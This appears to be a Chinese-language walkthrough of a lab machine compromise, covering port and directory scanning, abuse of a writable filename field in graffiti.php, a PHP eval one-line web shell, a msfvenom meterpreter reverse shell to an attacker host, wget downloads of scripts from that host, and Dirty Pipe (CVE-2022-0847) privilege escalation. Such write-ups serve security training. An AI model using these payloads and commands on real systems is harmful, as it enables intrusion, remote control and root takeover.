1 信息收集
1.1 主机发现
arp-scan -l
![](https://img-blog.csdnimg.cn/direct/2384a0d892e44365a7843cc247605125.png)
1.2 端口与服务扫描
![](https://img-blog.csdnimg.cn/direct/00de395dbd44426bb36603e5fdcf2402.png)
发现开放22、80、81端口
2 访问服务
2.1 访问80端口
![](https://img-blog.csdnimg.cn/direct/9b372a49ea594fffb076a0137aab81c7.png)
查看源代码
![](https://img-blog.csdnimg.cn/direct/738e2902f8d94cbd99ebe698703f86c4.png)
2.2 访问81端口
![](https://img-blog.csdnimg.cn/direct/08a9a10cda834b269d29cc61c9f4d125.png)
3 目录扫描
3.1 dirsearch目录扫描
dirsearch -u 192.168.1.14
![](https://img-blog.csdnimg.cn/direct/4fcab00f1a364c4282d3ea85c010e521.png)
发现robots.txt文件和javascript文件
访问文件
http://192.168.1.14/robots.txt
![](https://img-blog.csdnimg.cn/direct/62dbd48dbf474194adfdaf3e388cab65.png)
robot.txt提示我们继续找找
http://192.168.1.14/javascript/
![](https://img-blog.csdnimg.cn/direct/87006adb6e3f405e87e326ec0bf28404.png)
3.2 gobuster扫描
还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。
![](https://img-blog.csdnimg.cn/direct/55befab0b8754a2dbfa40037c90f7330.png)
gobuster的效率相比于dirsearch来说更快,当字典过大的时候选择gobuster是一个不错的选择。
gobuster dir -u http://192.168.1.14/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
![](https://img-blog.csdnimg.cn/direct/4166d686cb61440689fb642419a03a7b.png)
通过gobuster扫描了一个几十万的字典,我们可以看到有一个graffiti.php。这个可能就是关键点,尝试访问web页面。
http://192.168.1.14/graffiti.php
![](https://img-blog.csdnimg.cn/direct/5119906927d1410e9f4cb9e1a7c2bdc1.png)
4 渗透测试
4.1 抓包尝试
尝试输入1提交,并打开burp抓包啊查看,发现网站会将提交的内容追加到graffiti.txt文件中。
![](https://img-blog.csdnimg.cn/direct/a70806dbeea64a6cb4bcaf4c743de9c8.png)
![](https://img-blog.csdnimg.cn/direct/f70c850301944807ab9c5980fdb52659.png)
此时猜想该POST数据中的filename参数是否可控,因为内容是可控的,只要文件名可控,那么我们就可以轻易进行文件上传了。尝试保存为shell.php,点击send。
![](https://img-blog.csdnimg.cn/direct/67beb9b7126b45e885cae0edb9211cd1.png)
![](https://img-blog.csdnimg.cn/direct/d397cf69c30744a790ac0e69e8c8da48.png)
发现可以成功访问,接下来直接上传一句话木马。
<?php @eval($_POST['cmd']); ?>
![](https://img-blog.csdnimg.cn/direct/1a7dbfeab86a4584b56e408e215b9e64.png)
![](https://img-blog.csdnimg.cn/direct/387f58f7ac4d483c9fb78bba3ff3b5a9.png)
成功连接蚁剑执行命令发现为www-data权限。
![](https://img-blog.csdnimg.cn/direct/4ac04cfbbd894f2cab34a4dfc5d4cdac.png)
5 提权
5.1 利用MSF工具生成反弹连接
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.52 lport=4444 -o shell4.php
开启简易HTTP服务
python3 -m http.server
利用靶机下载反弹连接文件
![](https://img-blog.csdnimg.cn/direct/77d36aeac642499a92cf42e118b5e59f.png)
攻击机开启MSF监听
use exploit/multi/handler
set lhost 192.168.1.52
set payload php/meterpreter/reverse_tcp
set lport 4444
show options
run
![](https://img-blog.csdnimg.cn/direct/4fc76c1495ae4e4992e51e1a200749fd.png)
访问反弹连接文件
![](https://img-blog.csdnimg.cn/direct/40b4e9064d3647ea83b8b50d789731ab.png)
MSF反弹连接成功监听
![](https://img-blog.csdnimg.cn/direct/f7ad412e7d8a4c6a884d551b1d0cca8c.png)
5.2 利用脚本搜集漏洞
利用交互式Shell进入
python3 -c 'import pty;pty.spawn("/bin/bash")'
![](https://img-blog.csdnimg.cn/direct/9af35a8c2e8e452aadb9e52c27a89d8c.png)
脚本地址:https://github.com/The-Z-Labs/linux-exploit-suggester
下载脚本
wget 192.168.1.52:8000/linux-exploit-suggester.sh
![](https://img-blog.csdnimg.cn/direct/be54c516acd24dd08c0843548d8a95db.png)
查看脚本权限,并且给脚本赋可执行权
ls -al
chmod +x linux-exploit-suggester
![](https://img-blog.csdnimg.cn/direct/f1430584f15d4642ac9ae0b1afec8d97.png)
开测
./linux-exploit-suggester.sh
![](https://img-blog.csdnimg.cn/direct/05636349baa5491b837dc2852491ee59.png)
5.3 利用CVE漏洞提权
github上找到exp
https://github.com/r1is/CVE-2022-0847
让靶机下载
wget 192.168.1.52:8000/Dirty-Pipe.sh
![](https://img-blog.csdnimg.cn/direct/0c151b0b03ff40e8a708921880a13278.png)
给脚本赋可执行权并执行脚本
chmod +x Dirty-Pipe.sh
./Dirty-Pipe.sh
whoami
![](https://img-blog.csdnimg.cn/direct/f73fb4581d474cf9a733b5e2f94cebb7.png)